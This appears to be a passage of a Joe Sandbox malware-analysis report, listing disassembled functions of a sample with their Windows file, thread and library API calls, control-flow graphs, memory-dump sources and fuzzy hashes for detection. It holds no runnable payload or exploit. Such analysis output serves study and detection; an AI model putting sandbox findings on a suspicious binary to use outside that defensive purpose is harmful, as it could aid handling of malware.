                                                                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A2E9BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileH_prolog3_HandleWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2898186245-0
                                                                                                                                                      • Opcode ID: 31055693b0350cf92623853363a436f6c3a56fa1a0e743b4c739294ee67fdac1
                                                                                                                                                      • Instruction ID: 5eada716b6c9abd17f3fb19fe2850d2eba6a8bc19f46f10c6238b8eff4dff652
                                                                                                                                                      • Opcode Fuzzy Hash: 31055693b0350cf92623853363a436f6c3a56fa1a0e743b4c739294ee67fdac1
                                                                                                                                                      • Instruction Fuzzy Hash: 8B418C35A01364EFDF14DFA8E894BADBB76BF84711F044129E801AB291CB759D84CBA1
                                                                                                                                                      Function 00A2EFEF Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1280 a2efef-a2f00a call a457d8 call a313da 1285 a2f031-a2f033 1280->1285 1286 a2f00c-a2f00f 1280->1286 1287 a2f035-a2f03d call a2ed0d 1285->1287 1286->1285 1288 a2f011-a2f017 1286->1288 1297 a2f0e3-a2f0f0 GetLastError 1287->1297 1298 a2f043-a2f065 call a3169a 1287->1298 1289 a2f01b-a2f029 CreateDirectoryW 1288->1289 1290 a2f019 1288->1290 1292 a2f0d0-a2f0d4 1289->1292 1293 a2f02f 1289->1293 1290->1289 1295 a2f0d6-a2f0da call a2f58b 1292->1295 1296 a2f0df-a2f0e1 1292->1296 1293->1287 1295->1296 1301 a2f0fb-a2f100 call a45787 1296->1301 1297->1301 1302 a2f0f2-a2f0fa 1297->1302 1305 a2f067-a2f06e 1298->1305 1306 a2f07d-a2f087 1298->1306 1302->1301 1308 a2f073-a2f07b CreateDirectoryW 1305->1308 1309 a2f070 1305->1309 1310 a2f089-a2f09e 1306->1310 1311 a2f0bc-a2f0ce 1306->1311 1308->1306 1309->1308 1312 a2f0b3-a2f0bb call a45726 1310->1312 1313 a2f0a0-a2f0b0 call a219a9 1310->1313 1311->1292 1311->1297 1312->1311 1313->1312
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2EFF6
                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,00000024,00A2EBA7,?,00000001,00000000,?,?,00000024,00A2A4DE,?,00000001,?,?), ref: 00A2F01F
                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000024,00A2EBA7,?,00000001,00000000,?,?,00000024,00A2A4DE,?), ref: 00A2F075
                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000024,00A2EBA7,?,00000001,00000000,?,?,00000024,00A2A4DE,?,00000001,?,?,00000000), ref: 00A2F0E3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateDirectory$ErrorH_prolog3_Last
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3709856315-0
                                                                                                                                                      • Opcode ID: e126d1299e865d20e9d5bdc943fa5a17a94aa2779e78f79fba53a971174b3b1f
                                                                                                                                                      • Instruction ID: bb4a5119ad6860332d822bb7b880b3dc46caa1c9adb6b51024cf77a561e49e69
                                                                                                                                                      • Opcode Fuzzy Hash: e126d1299e865d20e9d5bdc943fa5a17a94aa2779e78f79fba53a971174b3b1f
                                                                                                                                                      • Instruction Fuzzy Hash: 5C318171904229DFDF10DFEDE9889EEBBB8AF48310F14443AE501E7252E7349985CB61
                                                                                                                                                      Function 00A2E019 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1318 a2e019-a2e025 1319 a2e032-a2e049 ReadFile 1318->1319 1320 a2e027-a2e02f GetStdHandle 1318->1320 1321 a2e0a5 1319->1321 1322 a2e04b-a2e054 call a2e152 1319->1322 1320->1319 1323 a2e0a8-a2e0ab 1321->1323 1326 a2e056-a2e05e 1322->1326 1327 a2e06d-a2e071 1322->1327 1326->1327 1328 a2e060 1326->1328 1329 a2e082-a2e086 1327->1329 1330 a2e073-a2e07c GetLastError 1327->1330 1331 a2e061-a2e06b call a2e019 1328->1331 1333 a2e0a0-a2e0a3 1329->1333 1334 a2e088-a2e090 1329->1334 1330->1329 1332 a2e07e-a2e080 1330->1332 1331->1323 1332->1323 1333->1323 1334->1333 1336 a2e092-a2e09b GetLastError 1334->1336 1336->1333 1338 a2e09d-a2e09e 1336->1338 1338->1331
                                                                                                                                                      APIs
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,00A2E5D2,?,?,00000000,?,00000000), ref: 00A2E029
                                                                                                                                                      • ReadFile.KERNELBASE(?,?,00000000,00100000,00000000,?,?,?,00000000,00A2E5D2,?,?,00000000,?,00000000), ref: 00A2E041
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,00A2E5D2,?,?,00000000,?,00000000), ref: 00A2E073
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,00A2E5D2,?,?,00000000,?,00000000), ref: 00A2E092
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$FileHandleRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2244327787-0
                                                                                                                                                      • Opcode ID: a5c3843b9790ae053e1e3ff47ee1fe988e795b306aa8efadf61be398de9ad521
                                                                                                                                                      • Instruction ID: 71435dbf0392b6649362909b78853f01f309b181f5fbd36a0d00970c68b3c53f
                                                                                                                                                      • Opcode Fuzzy Hash: a5c3843b9790ae053e1e3ff47ee1fe988e795b306aa8efadf61be398de9ad521
                                                                                                                                                      • Instruction Fuzzy Hash: 8411C230588328EFDB34DF68E904A6E37B9FB45321F104639E51685290C7F19ED6DB61
                                                                                                                                                      Function 00A37628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00010000,Function_00017760,?,00000000,?), ref: 00A3764C
                                                                                                                                                      • SetThreadPriority.KERNEL32(?,00000000,?,?,?,?,00000004,00A2736D,00A25AB0,?), ref: 00A37693
                                                                                                                                                        • Part of subcall function 00A292EB: __EH_prolog3_GS.LIBCMT ref: 00A292F2
                                                                                                                                                        • Part of subcall function 00A29500: __EH_prolog3_GS.LIBCMT ref: 00A29507
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3_Thread$CreatePriority
                                                                                                                                                      • String ID: CreateThread failed
                                                                                                                                                      • API String ID: 3138599208-3849766595
                                                                                                                                                      • Opcode ID: 2c05431194fab7e06c4cc64cc69283505aa45cb3811ff3cb008a6e7231696d91
                                                                                                                                                      • Instruction ID: ffe4b306a0d0f2fc83020cea64d0d1425acfdd8ff63c525dfc13b0fba8af3c76
                                                                                                                                                      • Opcode Fuzzy Hash: 2c05431194fab7e06c4cc64cc69283505aa45cb3811ff3cb008a6e7231696d91
                                                                                                                                                      • Instruction Fuzzy Hash: 3001A2B5388705BFE220AFA8AC82FA673A8FB45B11F20042DF58596181CAF178458768
                                                                                                                                                      Function 00A2DE9A Relevance: 4.6, APIs: 3, Instructions: 115fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2DEA1
                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,00000024,00A2E8F5,?,?,00A2A6B9,?,00000011,?), ref: 00A2DF15
                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,?,00A2D303,?,?,?), ref: 00A2DF65
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile$H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1771569470-0
                                                                                                                                                      • Opcode ID: 11167511b1b34b6edaff956ffcdd4523536bb28ae4374b04fdaf23f50e6067d2
                                                                                                                                                      • Instruction ID: 92befa25b93a2d200e7ec5160c3afffffd9cc74b52d84738cdbd26fe376001f9
                                                                                                                                                      • Opcode Fuzzy Hash: 11167511b1b34b6edaff956ffcdd4523536bb28ae4374b04fdaf23f50e6067d2
                                                                                                                                                      • Instruction Fuzzy Hash: CF416F71C103189FDB14DFA8D98ABEEB7F4FB48321F10562EF452A6282D774A9448B24
                                                                                                                                                      Function 00A36C5E Relevance: 4.6, APIs: 3, Instructions: 90libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A36C65
                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00A36C9A
                                                                                                                                                      • LoadLibraryW.KERNELBASE(00000000,?,?,00000000,00000000,?), ref: 00A36D0C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DirectoryH_prolog3_LibraryLoadSystem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1552931673-0
                                                                                                                                                      • Opcode ID: a1a881b041c7cbb89fe211f69be50fd9cc55932f9e5081aa434982b3533f2535
                                                                                                                                                      • Instruction ID: 3a0f42973b43c943d1afd01e7eab0fde7292c80ff3b416e9c1ad9c83614a5619
                                                                                                                                                      • Opcode Fuzzy Hash: a1a881b041c7cbb89fe211f69be50fd9cc55932f9e5081aa434982b3533f2535
                                                                                                                                                      • Instruction Fuzzy Hash: D0319C75D00358EFCB04EBE8D999BEEBBB8AF48315F104129E105B7282DB345A45CB61
                                                                                                                                                      Function 00A2F58B Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2F592
                                                                                                                                                      • SetFileAttributesW.KERNELBASE(?,?,00000024,00A2A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 00A2F5A8
                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,?,?,?,?,00A2D303,?,?,?,?,?,?,?,5C02E116,00000049), ref: 00A2F5EB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile$H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2559025557-0
                                                                                                                                                      • Opcode ID: df7ad05ef764464447ba462dfb1cc0b095d80685ef5e4f06c71c6f3ffe5b4b17
                                                                                                                                                      • Instruction ID: af146eee4c1c167e018a1b54b72045b61bcf994c196031cc33bd8c3bc54ac6f7
                                                                                                                                                      • Opcode Fuzzy Hash: df7ad05ef764464447ba462dfb1cc0b095d80685ef5e4f06c71c6f3ffe5b4b17
                                                                                                                                                      • Instruction Fuzzy Hash: 49110074910218EFDF04DFA8E985ADEBBB8BF48311F14443AF800E7250DB349A85CB64
                                                                                                                                                      Function 00A2EC63 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2EC6A
                                                                                                                                                      • DeleteFileW.KERNELBASE(?,00000024,00A2D6F7,?), ref: 00A2EC7D
                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,?,00000000), ref: 00A2ECBD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DeleteFile$H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3558260747-0
                                                                                                                                                      • Opcode ID: 351386f8f35c2c7af49df0e4051795d2209ccd6b144410f7f06ac87bb6241530
                                                                                                                                                      • Instruction ID: 37859a7cabd129345586272dc75f4a02c40e1f1cc96179c2d3ef6e0a886eedf3
                                                                                                                                                      • Opcode Fuzzy Hash: 351386f8f35c2c7af49df0e4051795d2209ccd6b144410f7f06ac87bb6241530
                                                                                                                                                      • Instruction Fuzzy Hash: B3111675D10229DBDF04DFE8E989ADEB7B8BF48311F14142AF801E7250DB34A984CBA4
                                                                                                                                                      Function 00A2ED1F Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2ED26
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00000024,00A2ED16,00000000,00A2A4A1,5C02E116,?,00A2CDDD,?,?,?,?,?,?,?,?), ref: 00A2ED39
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?), ref: 00A2ED79
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile$H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2559025557-0
                                                                                                                                                      • Opcode ID: 919f4aa6a2970fd15beb285592e67721d17fcd844e05f96f6aba3654a5bcea73
                                                                                                                                                      • Instruction ID: a6d386440c2626fe5c404dc4ad284b26f623ab9e37676edb017fbcf892146b7a
                                                                                                                                                      • Opcode Fuzzy Hash: 919f4aa6a2970fd15beb285592e67721d17fcd844e05f96f6aba3654a5bcea73
                                                                                                                                                      • Instruction Fuzzy Hash: 85110475D00218DFDF04DFE8E9899EDB7F9BB48321F14042AE501F3280DB3499858B64
                                                                                                                                                      Function 00A2E3D5 Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(000000FF,?,?,?,?,00000000,?,00000000,00A2E3B1,?,?,00000000,?,?,00A2CC21,?), ref: 00A2E55F
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00A2E56E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                      • Opcode ID: 4ddcc8db6d9ac8cf2825b449604c1e990e584fea01018280d1fd2b547b8b7ac8
                                                                                                                                                      • Instruction ID: cb437f30fc28dc93221e11a017d20a40128ef45f5f62403a3e904c8e3eb3799e
                                                                                                                                                      • Opcode Fuzzy Hash: 4ddcc8db6d9ac8cf2825b449604c1e990e584fea01018280d1fd2b547b8b7ac8
                                                                                                                                                      • Instruction Fuzzy Hash: 9041E4306043658BD724FF69E5846AAB3E5FB98320F14493DE88583241E776ECC58BA2
                                                                                                                                                      Function 00A2E772 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • FlushFileBuffers.KERNEL32(?), ref: 00A2E78C
                                                                                                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A2E840
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$BuffersFlushTime
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1392018926-0
                                                                                                                                                      • Opcode ID: e6e2c9e408250f428389ded5087005536d4f0c9ddb4ff419eaa5328f4eca543e
                                                                                                                                                      • Instruction ID: fdb5f98615c7015a353014c854d5351b5ab9ccf1d452389a9f4eaf502bc3da62
                                                                                                                                                      • Opcode Fuzzy Hash: e6e2c9e408250f428389ded5087005536d4f0c9ddb4ff419eaa5328f4eca543e
                                                                                                                                                      • Instruction Fuzzy Hash: 1721E1312493A1EFC714DF68D891AABBBE8AF95304F08492CF4C5C3181D329E98DD762
                                                                                                                                                      Function 00A3FB4B Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A3FB52
                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?,00000000,00A7535C), ref: 00A3FC24
                                                                                                                                                        • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileH_prolog3_Operation_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3104323202-0
                                                                                                                                                      • Opcode ID: b3bbd07ba418b46ebb27d9ea5acc76a007acc0281d336d28f2f364b68fe15858
                                                                                                                                                      • Instruction ID: 908b3dbcbf14de13360dc93db58237fd6adf378a4d87aad81a3f30731850befc
                                                                                                                                                      • Opcode Fuzzy Hash: b3bbd07ba418b46ebb27d9ea5acc76a007acc0281d336d28f2f364b68fe15858
                                                                                                                                                      • Instruction Fuzzy Hash: 1B3134B1D002589EDF14EFE9CA96ADDBBB4BF18350F54013AE019AB1A2DB700A45CF10
                                                                                                                                                      Function 00A2E850 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00A2E897
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00A2E8A4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                      • Opcode ID: ab0d5e5687075731c68e6716899be4e560a88be0dbd684347f0ea59126789574
